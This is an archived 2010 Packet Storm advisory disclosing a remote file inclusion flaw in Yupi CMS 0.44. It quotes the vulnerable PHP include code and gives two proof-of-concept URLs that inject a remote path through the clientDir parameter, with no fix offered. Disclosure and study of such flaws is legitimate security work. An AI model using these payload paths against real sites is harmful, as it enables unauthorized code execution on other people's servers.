Yupi CMS 0.44 Remote File Inclusion

2010-03-22T00:00:00
ID PACKETSTORM:87502
Type packetstorm
Reporter eidelweiss
Modified 2010-03-22T00:00:00

Description

                                        
                                            `#################################################################################  
Yupi Cms 0.44 <= Remote File Inclusion Vulnerability  
#################################################################################  
  
Title: Yupi Cms 0.44 <= Remote File Inclusion Vulnerability  
Version: 0.44  
Link: http://yupi-cms.com/  
License: http://www.opensource.org/licenses/afl-3.0.php  
Author: eidelweiss  
Contact: eidelweiss[at]cyberservices.com || g1xsystem@windowslive.com  
Thanks: JosS (hack0wn) - r0073r & 0x1D (inj3ct0r) - LeQhi - aRiee - idiot_inside - kuris  
Old friend in MEDANHACKER (c02,blackbandit,t0rnado,LordIRC,doegoel,qwert)  
Special Thank`s : AL-MARHUM - [D]eal [C]yber - syabilla_putri (miss u)  
  
#################################################################################  
History:  
  
[+] 13 march 2010 : Vend0r (Author) contact  
[-] No response  
[*] 21 march 2010 (GMT+7): Bug Share to public  
  
NB: This for educational purpose only , Author will not responsible for any damage  
  
## REQUIRES ##  
  
  
$thisDir = dirname(__FILE__);  
$clientDir = $thisDir;  
  
require_once $clientDir."/config.php"; <-- w0w  
  
  
  
  
  
define("SC_ROOT_PATH", php_file());  
  
function php_file($filename=""){  
global $Confing;  
$fc = substr($filename,0,1);  
if ($fc=="\\" or $fc =="/"){  
$filename = substr($filename,1);  
}   
  
$file = $Confing->PhpDir . $filename;  
return $file;  
  
################################################################  
  
P0C: ///filemanager/connectors/php/config.php?clientDir=[inj3ct0r]  
PATH/install/config.php?clientDir=[inj3ct0r] <- Not Sure LOL  
  
################################################################  
[ FIX ] Use Your Skill and Play Your Imagination  
################################################################  
`